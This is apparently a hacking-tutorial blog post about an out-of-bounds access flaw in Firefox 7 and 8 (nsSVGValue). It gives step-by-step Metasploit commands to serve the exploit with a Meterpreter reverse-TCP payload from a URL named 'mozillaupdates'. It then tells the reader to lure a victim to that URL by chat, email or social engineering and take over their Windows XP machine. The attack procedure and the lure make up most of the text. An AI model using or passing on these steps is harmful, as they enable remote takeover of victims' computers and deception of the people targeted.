How to Attacking on Remote PC using Firefox nsSVG Value Out-of-Bounds Access Vulnerability

This module exploits an out-of-bounds access flaw in Firefox 7 and 8 (<= 8.0.1). The notification of nsSVGValue observers via nsSVGValue::Notify Observers(x,y) uses a loop which can result in an out-of-bounds access to attacker-controlled memory. The mObserver ElementAt() function (which picks up pointers), does not validate if a given index is out of bound. If a custom observer of nsSVGValue is created, which removes elements from the original observer, and memory layout is manipulated properly, the ElementAt() function might pick up an attacker provided pointer, which can be leveraged to gain remote arbitrary code execution.

Exploit Targets

Mozilla Firefox 7

Windows XP SP2

Windows XP SP3


Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/Mozilla_nssvgvalue

Msf exploit (Mozilla_nssvgvalue)>set payload windows/meterpreter/reverse_tcp

Msf exploit (Mozilla_nssvgvalue)>set lhost (IP of Local Host)

Msf exploit (Mozilla_nssvgvalue)>set srvhost (This must be an address on the local machine)

Msf exploit (Mozilla_nssvgvalue)>set uripath mozillaupdates (The Url to use for this exploit)

Msf exploit (Mozilla_nssvgvalue)>exploit

Now an URL you should give to your victim

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

Leave a Reply

Your email address will not be published. Required fields are marked *